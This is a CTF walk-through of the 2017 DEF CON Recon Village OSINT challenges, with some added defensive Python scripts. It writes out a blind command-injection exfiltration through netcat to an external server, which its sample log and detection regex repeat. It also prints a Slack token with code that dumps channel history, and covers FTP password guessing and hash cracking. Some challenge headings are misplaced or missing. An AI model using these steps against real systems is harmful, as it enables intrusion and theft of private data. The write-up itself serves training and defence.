Recon Village CTF Overview
Overview
So Black Hat and DEF CON have come and gone and it was great to catch up with old friends, make new ones, and be surrounded by individuals who share a passion for hacking.
VoidMOSity and I signed up for the Recon Village CTF (Team RFS) because many of the lines for DEF CON conference talks and events that were of interest to us were long and standing around seemed like a waste of time. We did not plan on this CTF taking up our remaining conference time, which it inevitably did, and we were hooked on the challenges within a couple hours. This was the first year DEF CON had a village for open source intelligence and reconnaissance tradecraft. The organizers who ran the village and CTF did an outstanding job. Overall, the CTF was well organized, competitive, and challenging.
Before we dive into the challenge walk-throughs, there were a few lessons learned that we would like to offer others who may be new to CTFs. Treat it like a real penetration test, which means take good notes, screenshots, and save tool output. We documented very little as neither of us thought we would place, let alone do a CTF write-up. We had to go back and re-document most of the challenges, which is why timestamps will be off in some of the tool output and screenshots. Another lesson learned is that we should have started participating in CTFs sooner. This was my first time competing in a CTF and voidMOSity’s second. For those out there who have shied away from participating in CTFs, do it! They are a great way to expand your skill set, as well as expose yourself to new challenges, which ultimately make you a stronger, more agile penetration tester (or defender, investigator, etc.).
This CTF used Facebook’s open source CTF platform. Neither of us had used it before, but we thought it was a fun way to go through a CTF. The competition consisted of 14 jeopardy-style challenges of varying difficulty. Each challenge was associated with a country and points were broken down like so:
- Algeria: 200
- Libya: 200
- Congo: 100
- United States: 400
- India: 100
- Pakistan: 100
- Australia: 300
- Greenland: 500
- United Kingdom: 100
- Germany: 100
- Brazil: 200
- Bolivia: 200
- Argentina: 100
- Russia: 300
An additional 5 points were awarded to the teams who were the first to capture a country. Certain challenges allowed participants to request hints; however, points would be taken away if requested. Challenges were designed to test the participant’s technical proficiency in OSINT tradecraft, as well as penetration and web application testing.
Team RFS was the only team to solve all the challenges, while requesting no hints. Also important to note, if seriously competing, don’t expect much sleep as many of the teams were engaged both day and night. Neither of us got much sleep!
We have taken the time to document the challenges, including applicable screenshots, scripts, and tool output. At the village closing ceremony, there were a number of individuals and teams who wanted to know how some of the challenges were completed. This post should hopefully answer those questions. I have presented it in a way that a novice pentester or OSINT investigator should be able to digest and understand.
Challenge 1 — Algeria
Overview
Points: 200
Description:
HR dept was compromised through Phishing and Payroll data was stolen. Our investigation team dumped the pcap traffic for a few machines, which is attached. Help them find out the Twitter [social media] handle of the attacker.
Attachment: Challenge-4_42e6f673622d0b243f7bd8394acc96cb.pcap
Skills Required: Packet analysis, document metadata analysis, and Twitter OSINT.
Walk-Through
Because the attack involved phishing, it is not unreasonable to assume there was most likely a maldoc involved in the attack. There are several ways to analyze packet captures and carve out attachments, including Wireshark and tools like Foremost. One note about Foremost is that it will alter the file name when extracting the document, which could impact your investigation if the name were part of a clue or a lead. For those interested, there is a SANS white paper on extracting files from packet captures which details several different ways. We used Wireshark as the process is straightforward, easy, and does not modify the contents of the file. The frame we’re interested in is #241, where we see an HTTP GET request with a wget user-agent string for the file OpenMe.docx from 192.168.0.100 on TCP port 8000.
This is followed by frame #253, where we see the victim successfully receiving the file from a malicious web server running Python’s SimpleHTTP module.
Wireshark makes file extraction very easy. Wireshark has an “Export Objects” function, which allows the analyst to export different file types to include DICOM, HTTP, SMB, and TFTP. In this scenario, HTTP is selected.
Regarding documents, it’s always important to look for potential data leakage via metadata. There are many tools out there to accomplish this task; however, we have found Phil Harvey’s ExifTool to consistently work with clean output.
Note that if this were a real investigation, we would need to produce the hash checksum, run it through resources like VirusTotal and Malwr, and detonate the maldoc in a controlled environment. In this case, it’s not required.
There are a number of items that stick out in the above screenshot. We can see the file was created by HilalSchuurbiers21@gmail.com and last modified by “Sudhanshu Chauhan”, who is one of the individuals that developed the CTF, so we can safely ignore that entry.
As far as content, the document did not contain any actionable intelligence.
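The creator and last-modified-by values ExifTool reported come from docProps/core.xml inside the .docx zip container. As an added example (not code from the original post), the following standard-library script builds a constructed .docx with sample metadata and reads those same fields back, which is a useful offline check on any document before it is sent or after it is received:

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# XML namespaces used by docProps/core.xml (OOXML core properties)
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}

# The fields a reviewer cares about: author identities and revision timestamps,
# which is exactly what ExifTool surfaced for OpenMe.docx in the write-up.
FIELDS = {
    "creator": "dc:creator",
    "last_modified_by": "cp:lastModifiedBy",
    "created": "dcterms:created",
    "modified": "dcterms:modified",
    "title": "dc:title",
    "description": "dc:description",
}


def read_core_properties(docx_bytes: bytes) -> dict:
    """Return the core-property metadata embedded in a .docx/.xlsx/.pptx file.

    OOXML documents are zip containers; docProps/core.xml holds author and revision
    metadata. A missing core.xml or missing fields yield None rather than an error.
    """
    result = {name: None for name in FIELDS}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if "docProps/core.xml" not in zf.namelist():
            return result
        root = ET.fromstring(zf.read("docProps/core.xml"))
    for name, tag in FIELDS.items():
        node = root.find(tag, NS)
        if node is not None and node.text:
            result[name] = node.text.strip()
    return result


def leaked_identities(props: dict) -> set:
    """Distinct identity strings (creator / last editor) the document would reveal."""
    return {v for k, v in props.items() if k in ("creator", "last_modified_by") and v}


def build_sample_docx(creator: str, last_modified_by: str) -> bytes:
    """Construct a minimal .docx (sample input, not the CTF file) carrying the given metadata."""
    core_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s" xmlns:dcterms="%s" '
        'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
        "<dc:creator>%s</dc:creator>"
        "<cp:lastModifiedBy>%s</cp:lastModifiedBy>"
        '<dcterms:created xsi:type="dcterms:W3CDTF">2017-07-01T10:00:00Z</dcterms:created>'
        '<dcterms:modified xsi:type="dcterms:W3CDTF">2017-07-03T12:30:00Z</dcterms:modified>'
        "</cp:coreProperties>"
    ) % (NS["cp"], NS["dc"], NS["dcterms"], escape(creator), escape(last_modified_by))
    document_xml = ('<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/'
                    'wordprocessingml/2006/main"><w:body/></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types xmlns="http://schemas.'
                    'openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("docProps/core.xml", core_xml)
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample values; the real file's values are in the screenshot above
    sample = build_sample_docx("attacker@example.invalid", "CTF Organizer")
    props = read_core_properties(sample)
    for key, value in props.items():
        print(f"{key:17}: {value}")
    print("identities revealed:", sorted(leaked_identities(props)))
```

Point read_core_properties at the bytes of a real file (open(path, "rb").read()) to check a document extracted from Wireshark the same way.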
The objective for this challenge is to find the Twitter handle of the attacker. Search engine results were reviewed, but no data was found matching this particular email address to a Twitter account. In order to match the email address with a Twitter handle, Gmail was leveraged to import the email address as a new contact, followed by using Twitter’s “Find friends” functionality, which parses Gmail contacts and matches them to Twitter accounts. If the contact has registered a Twitter account under the Google contact email address, it will reveal the handle, the name, as well as the profile picture and the bio of the account.
The Twitter account handle i4mth4tculpri7 was the flag.
Challenge 2 — Libya
Overview
Points: 200
Description:
Profile the user identified in challenge 1 and find the building he’s been staying in. What does the building say?
Skills Required: Twitter, Instagram, and Google Maps OSINT.
Walk-Through
The Twitter and Instagram accounts for “i4mth4tculpri7” were manually analyzed for any actionable intelligence. There were a number of interesting tweets from June 22 through July 3, 2017, indicating the user may be in Amsterdam.
There was one specific tweet that appeared to contain actionable intelligence.
We know the location will be a hotel, the user will be targeting the company “x64corp”, and we have the GPS coordinates “52.3913066,4.8357588”, which can be run through utilities like Google Maps. A quick note on online mapping websites: it’s always good practice to check multiple sources, e.g., Google Maps, Bing Maps, Mapillary, etc. Michael Bazzell has a great list here under “Maps”. This is important because many mapping websites capture satellite and street view images at different times.
Before diving into Google Maps, the user’s Instagram account was reviewed for any posts of interest. Again, on July 3, 2017, the user posted another threat against x64Corp.
The coordinates “52.3913066,4.8357588” were imported into Google Maps.
Next, the location was analyzed using Google street view.
We can see that the building “Radarport” shares similar details with the building in the Instagram post, which concludes the challenge. The building name radarport was the flag.
Challenge 3 — Congo
Overview
Points: 100
Description:
Paul was System Admin at x64 Corporation. He had an argument with his manager and left the company a few days back. Being disappointed, he started leaking sensitive data. He also deleted all the employee records. Help our investigators to find his Phone number.
Skills Required: Website archive OSINT.
Walk-Through
The primary website for x64Corp, which is hosted on GitHub servers, had contact information for only one Sys Admin, Roger Stone. The Git commit history was reviewed, but no useful information was identified.
Wayback Machine was leveraged to view an older archive of the website from June 21, 2017 and Paul’s phone number was identified.
The phone number 559811232121278 was the flag.
Challenge 4 — United States
Overview
Points: 400
Description:
Someone leaked company’s server information which led to a serious hack.
Hacker left this signature: BrunoRochaAlvesFelipeAraujoGoncalves. And said: Find me by the gist. Remember hackers are anonymous.
Can you help us find what exact information was leaked?
Skills Required: GitHub Gist OSINT, and basic web application testing experience.
Walk-Through
By default, GitHub does not display anonymous posts in Gist search results, and the anon:true parameter must be used. The gist was identified using the exact search: anon:true BrunoRochaAlvesFelipeAraujoGoncalves.
Closer inspection of this gist revealed a possible HTTP service running on IP address “13.56.108.41” on TCP port “8881”.
Accessing the server on the specified HTTP port showed the following message on the page.
The displayed message was taken as a hint as to the next steps. It appeared the index.php file could potentially execute commands, with the web page stating:
“My name is index. I will wait for your command.”
The static locations “/home/bob” were initially thought to be the location of the flag; however, later it was revealed these locations were not present on the server.
Next, several parameters were tested against the index.php file in an attempt to get command execution and have the output returned on the page. After attempting several variations of possible parameters, such as “command” or “cmd”, with no visible command execution, Burp Suite was used to take a closer look at the requests.
An initial request was captured in the Burp Suite proxy using the command GET parameter and was then sent to the Intruder module to run subsequent requests.
GET /index.php?command=cat%20/etc/passwd HTTP/1.1
Host: 13.56.108.41:8881
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Running several requests using the parameter command with the Burp Intruder module showed a response length of 299 bytes for each request.
However, running the Burp Intruder module with the parameter cmd resulted in 298-byte response lengths for each request.
This was an interesting observation, and it was the team’s realization that the command execution could be blind (i.e., no output being displayed on the web page). To test the theory, team members sent another request to the server using the parameter cmd with the value sleep 10. After executing, the web page appeared to sit and process this command for roughly 10 seconds, confirming that the command injection was blind.
Now knowing the command injection was blind, a way to receive the output of various commands was still needed. Attempting to execute commands like “wget” to fetch Internet-based files and then watching for hits on the server side resulted in no success; however, DNS requests made with the nslookup or dig commands did appear to successfully make it out to the Internet. One would think just using the “cat” command on the previously noted static files for the flag locations (/home/bob/flagpart1 and 2) and then supplying the output to the DNS requests might be the best way to exfiltrate the flags. Wrong! After several failed attempts at blindly revealing the contents of these files, a new solution was needed.
We knew that DNS requests were allowed to egress the server, which would require UDP port 53. A netcat listener on UDP port 53 was then configured on an externally controlled server to receive any incoming traffic from the victim machine. The following command was used on the externally controlled server to accomplish this.
nc -unvlp 53
Back on the vulnerable web server, the team attempted to execute commands and send their output to the netcat listener. After some further trial and error, the team came up with the following solution using netcat on the victim side.
<command to be executed> | nc -vnu <IP address of the external server> 53
Now listing the contents of the “flag” directory showed two files, “random.txt” and “useful.txt”. The flag was found in useful.txt; surprise, surprise. 400 points in the bag!
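From the defender’s side, the two tells the team relied on (a one-byte difference in response length between the parameters, and a 10-second stall on a “sleep 10” value) both leave traces in a web server’s access log. As an added example (not from the original post), this script runs simple command-injection detection over a constructed set of log lines; it assumes a combined-format log with nginx’s $request_time appended as a final latency column.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample (not the CTF server's real log): combined format plus a trailing
# request-time field. The requests mirror the probing described in the write-up.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Jul/2017:14:01:02 +0000] "GET /index.php HTTP/1.1" 200 299 "-" "Mozilla/5.0" 0.004
203.0.113.5 - - [29/Jul/2017:14:01:09 +0000] "GET /index.php?command=cat%20/etc/passwd HTTP/1.1" 200 299 "-" "Mozilla/5.0" 0.005
203.0.113.5 - - [29/Jul/2017:14:02:11 +0000] "GET /index.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 298 "-" "Mozilla/5.0" 0.006
203.0.113.5 - - [29/Jul/2017:14:03:40 +0000] "GET /index.php?cmd=sleep%2010 HTTP/1.1" 200 298 "-" "Mozilla/5.0" 10.012
203.0.113.5 - - [29/Jul/2017:14:05:02 +0000] "GET /index.php?cmd=ls%20/flag%20%7C%20nc%20-vnu%20198.51.100.7%2053 HTTP/1.1" 200 298 "-" "Mozilla/5.0" 0.120
198.51.100.20 - - [29/Jul/2017:14:06:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0" 0.003
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "[^"]*" "[^"]*" (?P<rt>[\d.]+)$'
)

# Shell metacharacters are the strongest single signal; a bare tool name is weaker,
# so it is only reported when the value also looks like a command line (space or path).
META_RE = re.compile(r"[|;&`]|\$\(|\n")
TOOL_RE = re.compile(r"\b(sleep|nc|ncat|netcat|nslookup|dig|wget|curl|bash|sh|cat|id|whoami)\b")
SLOW_SECONDS = 5.0  # latency a trivial PHP page should never reach without help


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    rec["rt"] = float(rec["rt"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes; keep_blank_values so a bare "?cmd=" is still visible
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def suspicious_params(params):
    """Return (name, decoded_value, reason) for each query value that looks like shell input."""
    hits = []
    for name, value in params:
        value = unquote_plus(value)  # second decode catches double-encoded payloads
        if META_RE.search(value):
            hits.append((name, value, "shell metacharacter"))
        elif TOOL_RE.search(value) and (" " in value or "/" in value):
            hits.append((name, value, "command-like value"))
    return hits


def analyze(log_text):
    """Flag lines showing command-injection indicators or time-based blind-injection latency."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        reasons = [f"param {n}={v!r}: {why}" for n, v, why in suspicious_params(rec["params"])]
        if rec["rt"] >= SLOW_SECONDS:
            reasons.append(f"latency {rec['rt']:.1f}s (possible time-based blind injection)")
        if reasons:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                             "bytes": rec["bytes"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ip']} {f['ts']} {f['path']} ({f['bytes']} B)")
        for r in f["reasons"]:
            print("   -", r)
```

Egress filtering that only blocks TCP while leaving UDP/53 open to arbitrary hosts is the other gap this challenge illustrates; pairing the log check with a DNS-only egress policy closes the path the netcat listener used.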
Overview
Points: 100
Description:
Dan has shared an IP 54.183.214.103 which he suspects the hackers used to attack us. He was able to ping it a few minutes back, but it’s not responding anymore. Can you find out anything which might be helpful?
Skills Required: Passive IP search engine OSINT.
Walk-Through
There are several websites to passively review information about IPs, to include SSL certificate information. Shodan was leveraged to review data on the IP address “54.183.214.103”. According to Shodan, TCP ports 80 and 443 were accessible.
The HTTP header response that Shodan was able to capture indicates the target enjoys photography and points to the Flickr account handle bilalkharjilal337, which is the flag for the challenge.
An additional observation was that Censys captured even more information than Shodan. We can see the server also had a directory index available and served server.py, test.py, and test2.py.
Challenge 6 — Pakistan
Overview
Points: 100
Description:
Can you find out the location of the hacker using the IP in challenge 5?
Skills Required: Flickr OSINT and EXIF photo metadata analysis.
Walk-Through
The Flickr account “bilalkharjilal337” was identified by searching the Flickr website and was found to contain only one photo. According to user-supplied information on the profile, the user’s location was Beirut. Some EXIF information was present, but by default Flickr does not show all of it.
The same exiftool used earlier could be leveraged; however, we want to introduce another popular tool: Jeffrey’s Image Metadata Viewer. EXIF data was reviewed and additional metadata was uncovered, including GPS coordinates, as seen below.
Jeffrey’s tool is nice because not only do we get clean output, but it also automatically maps any identified GPS coordinates and displays the location via Google Maps. If OPSEC is of concern, we recommend avoiding online tools like Jeffrey’s and sticking to exiftool or a similar local, offline tool.
The flag for this challenge is the GPS coordinates.
Another utility worth mentioning is Ghiro. Ghiro is a photographic forensic tool that performs the same functions as exiftool and Jeffrey’s tool and much more, including error level analysis to look for photo manipulation.
Challenge 7 — Australia
Overview
Points: 300
Description:
Our company doesn’t spend a lot on paid products, and we use a lot of open source / free products. For example we use git for version controlling — https://github.com/x64Corp
Since teams don’t use any centralized chat system, it’s difficult to monitor the same. Our CTO suspects that someone is keeping an eye on our discussions. Not sure how. Can you help?
Skills Required: Slack OSINT, Python scripting, and basic knowledge of Slack API.
Walk-Through
The GitHub link provided in the challenge was used to begin looking for possible clues about how someone might be able to keep an eye on x64Corp employee discussions. After looking through the various repositories in the provided GitHub link, it was observed that two individual accounts were part of the x64Corp organization, “jrianjack” and “malakhshou”.
After visiting these user profiles and searching through the various repositories they had contributed to, an interesting project called private_server was identified in connection with the “malakshou” account; more specifically, this project was noted to contain x64Corp’s internal Slack configuration files.
Taking a look at the appengine_config.py file in the most recent revision, several placeholders for adding Slack API keys were present; however, none of the values were filled in.
Upon further inspection of this repository, it was observed that several iterations of this file were present in the commit history, which at one point in time did contain a Slack API token within the configuration. Slack would be a good way to monitor internal discussions if the API token was known.
With the Slack API token now known, team members began working on a solution to query various aspects of the API using some quick Python code. The slackclient Python module was downloaded to perform these tasks.
After running a few initial API calls with the slackclient Python module to gather details about the available channel IDs, the following Python code was used to dump the channel history.
from slackclient import SlackClient

# Token recovered from the repository's commit history (see above)
slack_token = "xoxp-204882332822-203523130257-204081355250-8200a7efb0bec7fbd5894bf09bc7ab08"
sc = SlackClient(slack_token)

# Enumerate channels (archived ones included) to learn their IDs
print("Channel list------------------------------------")
print(sc.api_call("channels.list", exclude_archived=0))
print("Channel list------------------------------------")

# Details for the channel of interest, identified from the listing above
print("Channel info------------------------------------")
print(sc.api_call("channels.info", channel="C60RY9W8N"))
print("Channel info------------------------------------")

# Workspace members, to map the user IDs in messages back to names
print(sc.api_call("users.list"))

# Dump the message history of the channel; the flag was found in this JSON output
print("Channel Messages----------------------------------")
print(sc.api_call("channels.history", channel="C60RY9W8N"))
This Python code was then run, which returned the entire channel history in JSON data where the flag was then identified.
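The token was gone from the latest revision but still recoverable from history, which is exactly the case a repository secret scan must catch. As an added example (not from the original post or the project), the following scanner looks for Slack-style tokens across an ordered list of file revisions and reports whether each token is still present at HEAD; the history and token value below are constructed, and obtaining the revisions from git (for example with git log -p or git show <sha>:<path>) is left to the caller.

```python
import re

# Slack token shapes: xoxp (user), xoxb (bot), xoxa/xoxr (app/refresh). The body is
# dash-separated numeric segments followed by a hex secret; lengths vary, so the
# pattern is deliberately loose and findings are post-filtered in find_tokens().
SLACK_TOKEN_RE = re.compile(r"\bxox[abpr]-[0-9A-Za-z-]{20,}\b")
# Values that are clearly documentation placeholders rather than live credentials
PLACEHOLDER_RE = re.compile(r"(your|example|placeholder|changeme|xxx|token-here)", re.I)


def find_tokens(text):
    """Return the distinct Slack-style tokens in text that do not look like placeholders."""
    found = []
    for m in SLACK_TOKEN_RE.finditer(text):
        tok = m.group(0)
        if PLACEHOLDER_RE.search(tok):
            continue
        segments = tok.split("-")[1:]
        # Real tokens carry at least one purely numeric segment before the secret part
        if not any(seg.isdigit() for seg in segments):
            continue
        if tok not in found:
            found.append(tok)
    return found


def scan_history(revisions):
    """Map each token seen in any revision to the commits containing it and whether
    it survives in the newest revision.

    revisions: list of (commit_id, file_content) ordered oldest to newest.
    """
    seen = {}
    for commit_id, content in revisions:
        for tok in find_tokens(content):
            seen.setdefault(tok, []).append(commit_id)
    _, newest_content = revisions[-1]
    newest_tokens = set(find_tokens(newest_content))
    return {
        tok: {"commits": commits, "first_seen": commits[0], "still_present": tok in newest_tokens}
        for tok, commits in seen.items()
    }


# Constructed history of a config file like the write-up's appengine_config.py.
# The token is a fabricated, token-shaped string (assumption), not a real credential.
HISTORY = [
    ("a1b2c3d", 'SLACK_TOKEN = "xoxp-111111111111-222222222222-333333333333-0123456789abcdef0123456789abcdef"\n'
                'SLACK_CHANNEL = "#general"\n'),
    ("d4e5f6a", 'SLACK_TOKEN = ""  # removed here, but it lives on in history\n'
                'SLACK_CHANNEL = "#general"\n'),
    ("0badf00", 'SLACK_TOKEN = ""\nSLACK_CHANNEL = ""\n'),
]

if __name__ == "__main__":
    for tok, info in scan_history(HISTORY).items():
        status = "STILL PRESENT" if info["still_present"] else "removed at HEAD (rotate it anyway)"
        print(f"{tok[:12]}... first seen {info['first_seen']} in {len(info['commits'])} commit(s): {status}")
```

A token that has ever been pushed should be treated as compromised and rotated; removing it from the working tree, as this repository's history shows, is not enough.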
Challenge 8 — Greenland
Overview
Points: 500
Description:
I own 13.56.108.41. I don’t trust people.
I play with malwares. Hack my servers. bwhaha!
Skills Required: IP search engine OSINT, Pastebin OSINT, Twitter OSINT, Facebook OSINT, basic knowledge of FTP.
Walk-Through
The Greenland challenge was a lot of fun and one of the more difficult challenges as participants were not given much information other than a starting IP address with no clear indication what the flag could potentially be.
Shodan was used to passively analyze the host, which provided a good lead.
The output shows a web server hosted with an SSL certificate that includes the email address “Rafaela.Pereira@x64-corp.com” and what appears to be an internal hostname, “prod02.x64-corp.com”, in the certificate CommonName; we can conclude this is most likely a production system for x64Corp.
Michael Bazzell’s paste search tool, which uses a Google custom search engine to search 57 known paste sites, was leveraged to run the email address “Rafaela.Pereira@x64-corp.com” through.
Two results were identified. The first result, which was uploaded July 19, 2017, was of interest as it contained information about the person of interest being doxed.
Information included the email address, date of birth, and a Twitter handle. The Twitter account was immediately reviewed.
One takeaway from the Twitter account is the profile picture. The URL was passed through Google’s reverse image search.
The profile picture was taken from the 1953 science fiction movie Donovan’s Brain. It’s always important to note connections like this when conducting OSINT investigations as it tells us more about the user.
One nice feature about Facebook search functionality is it allows the investigator to query via email address. Facebook revealed Rafaela’s profile, which also contained the same profile picture.
One important note to point out is the profile contains the nickname donovan. A previous tweet had mentioned the following statement, which appears to be of value based on this new information:
what’s in a nickname…am I right?
The Facebook profile contained several items of interest on the Timeline. On July 20, 2017, Rafaela mentioned an interest in security with a focus on malware. Cuckoo, which is an automated sandbox application for analyzing malware is specifically mentioned.
Another interesting post from the same day:
This post and reply will play a major role in the challenge, so be sure to take note. The Spanish translates to:
“The job is monitoring Linkedin, so I’m going to empty the data here”
Rafaela has followed up to the post with the reply:
??42|french|MONDAY|type|EXPECT|were|TEACHER|82??
Digging deeper into the profile, we can see a malformed or invalid URL in the account “Overview” under the “About” section.
Lastly, the account “Details” section shows a reference to Malwr, which is a hosted Cuckoo solution, as well as what appears to be a hash and the account nickname “donovan”.
All the data outlined above was collected and put through a search engine to see what new leads could be identified, while simultaneously following up with malwr.com. A Google search for the malformed URL “MjEyM2U1MmIzM2JmNDYzNTk5YmQ5YWNiOGRkMDNjNmU” revealed a direct link to the Malwr entry. Additionally, the hash “ecdba596e0ba8e3ec0f3147980ed22faf0fcf020” could also have been used as the search term, as Google indexes data from Malwr submissions.
The Malwr submission was a filename called “5.jpg” and was uploaded July 19, 2017, so it aligned with the timing of the Facebook post activity.
The “5.jpg” file was downloaded and uploaded to Jeffrey’s Image Metadata Viewer, which successfully extracted all of the metadata.
The metadata file description contained a base64-encoded string, which Jeffrey’s tool automatically decoded to “fifty-two.nine.sixty-five.two-twenty-five”, i.e., “52.9.65.225”. Also note the user comment of “eff-tee-pee”. Censys was then leveraged to passively view port information for the IP address.
Censys confirmed there was an FTP server listening on the port. An FTP client was used to connect to the host, followed by manual password guessing. We assumed the username would be “donovan” based on the intel Rafaela had provided. In the end, the password was the string “??42|french|MONDAY|type|EXPECT|were|TEACHER|82??” mentioned in the Facebook reply.
As seen above, a directory listing revealed a file named “flag.txt”, which was downloaded and printed, revealing the contents “Amidst the mists and coldest frosts he thrusts his fists against the posts and still insists he sees the ghosts”.
This was the last challenge we completed and getting the 500 points put us at the top and with only 1 hour left on the clock!
Challenge 9 — United Kingdom
Overview
Points: 100
Description:
Our CTO (zakjohnson_1980) somehow leaked sensitive keys.
Skills Required: Twitter OSINT, ASCII decoding, and AES decryption.
Walk-Through
The Twitter account mentioned in the challenge description was identified and reviewed. One of the first things of interest was the QR code for the Twitter profile picture.
The QR code URL was imported into an online QR decoder tool resulting in a gist link.
The gist URL was recently submitted by an anonymous user and contained two items of interest.
The first string was recognized as ASCII and Burp Suite was used to decode and reveal “uuuuuuiiiiii”.
Next, an AES decryption website was leveraged to import the decoded key “uuuuuuiiiiii” and decrypt “JZ5xVbdrIjWL1Cj2hNs+kKU7pBr49a+lWZcMBmdkagM=”, revealing the flag Sup3rS3cr3tk3y@3221.
Challenge 10 — Germany
Overview
Points: 100
Description:
Find the IP Address of the Netweaver Application that runs on an apache server and sits in Switzerland
Skills Required: Shodan OSINT.
Walk-Through
Shodan was used to search for “Netweaver”, with the Switzerland country abbreviation “CH”, and “Apache”. The exact search query string was: netweaver country:ch product:apache.
The flag was the IP address 91.212.75.227.
Challenge 11 — Brazil
Overview
Points: 200
Description:
Company x64-corp has received an email which says:
Hi,
This bad chap out there tracks leaked info. He got some info about us too and leaked that same. http://ow.ly/Zx8y30e0EKu Can you help us identify the info he’s leaked.
Skills Required: Basic knowledge of zip and 7zip, and Pastebin OSINT.
Walk-Through
A URL shortener analyzer was used to inspect the ow.ly link and was found to be pointing to a directory on Google Drive.
The Google Drive location “whose_data” contained a .zip and .7z files.
The .7z file “this_data.7z” was encrypted and password protected; however, the .zip file “why_data.zip” was a normal compressed file, which was decompressed and yielded a text file named “what_data”.
The contents of “what_data” were assumed to be the decryption password for “this_data.7z”, which was successfully decrypted and yielded a new text file named “S3cr3tp4st3dum9” containing sixteen pastebin.com URLs.
The content of all pastebin.com URLs was analyzed, with only one containing actionable intelligence.
This post appeared to be the leaked data the challenge description referred to. All unique terms on the page were submitted as flags, with gue55wh4therei5theflag.x32corp.org being the flag.
Challenge 12 — Bolivia
Overview
Points: 200
Description:
Great, you found something in challenge 11, but are they really usable or just another bunch of garbage?
Skills Required: Identifying hashes, and cracking hashes.
Walk-Through
In challenge 11, nine hashes were found leaked and identified as SHA1.
Before using a password cracking rig, an online SHA1 hash cracker was checked to identify any pre-cracked hashes, resulting in the hash “4642e9dd8056bb057056bf75a73f74600e1f8e7b” being on the list. The flag for the challenge was notthisone.
Challenge 13 — Argentina
Overview
Points: 100
Description:
Cracked password in challenge 12? seems useful? Really?
Skills Required: Hash cracking.
Walk-Through
The team assumed additional hashes would need to be cracked. While a dictionary attack using hashcat chewed through the hashes, various online hash crackers were checked. One online hash cracker had the plain-text password for the hash “b2399b0109bfc8090a51d7098367512fb7e5d9ec”. The flag was notthisone2.
Challenge 14 — Russia
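Challenges 12 and 13 together are the classic identify-then-crack workflow: recognise the digest type from its form, then run a wordlist with mangling rules (the second plaintext is the first with a digit appended, the kind of transformation a hashcat rule would try). As an added example (not from the original post), this script covers both steps with hashlib only; the two hash values are the ones quoted above and the wordlist is constructed.

```python
import hashlib
import re

# The two digests quoted in the write-up, identified as SHA1 by their 40-hex-character form
LEAKED_HASHES = [
    "4642e9dd8056bb057056bf75a73f74600e1f8e7b",
    "b2399b0109bfc8090a51d7098367512fb7e5d9ec",
]

# Constructed wordlist; "notthisone" mirrors the style of the recovered plaintexts
WORDLIST = ["password", "x64corp", "notthisone", "letmein"]

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
# Unsalted hex digests are only distinguishable by length; MD5 and NTLM both give 32
# hex chars, so a 32-char value needs context (NTLM is not a hashlib algorithm).
BY_LENGTH = {32: ["md5", "ntlm"], 40: ["sha1"], 56: ["sha224"],
             64: ["sha256"], 96: ["sha384"], 128: ["sha512"]}


def identify(h):
    """Candidate algorithms for a bare digest string (no salt, no $id$ prefix)."""
    if h.startswith("$"):
        return ["modular-crypt format (bcrypt/sha512crypt/...)"]
    if not HEX_RE.match(h):
        return []
    return BY_LENGTH.get(len(h), [])


def candidates(word):
    """Hashcat-style rule set: identity, capitalised, and each with a single digit appended."""
    yield word
    yield word.capitalize()
    for d in range(10):
        yield f"{word}{d}"
        yield f"{word.capitalize()}{d}"


def sha1_hex(text):
    """Hex SHA1 of a string; used to build known-answer inputs when testing the cracker."""
    return hashlib.sha1(text.encode()).hexdigest()


def crack(hashes, wordlist, algo="sha1"):
    """Dictionary attack with the mangling rules above; returns {hash: plaintext} for hits.

    algo must be a hashlib algorithm name (sha1, md5, sha256, ...).
    """
    targets = {h.lower() for h in hashes}
    cracked = {}
    for word in wordlist:
        for cand in candidates(word):
            digest = hashlib.new(algo, cand.encode()).hexdigest()
            if digest in targets and digest not in cracked:
                cracked[digest] = cand
                if len(cracked) == len(targets):
                    return cracked  # stop early once every target is recovered
    return cracked


if __name__ == "__main__":
    for h in LEAKED_HASHES:
        print(h, "->", identify(h))
    hits = crack(LEAKED_HASHES, WORDLIST)
    for h in LEAKED_HASHES:
        print(h, "=", hits.get(h, "<not in wordlist + rules>"))
```

For anything beyond a toy list, hand the candidates to hashcat or John the Ripper; the value of the pure-Python version is seeing exactly which rule produced a hit.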
Overview
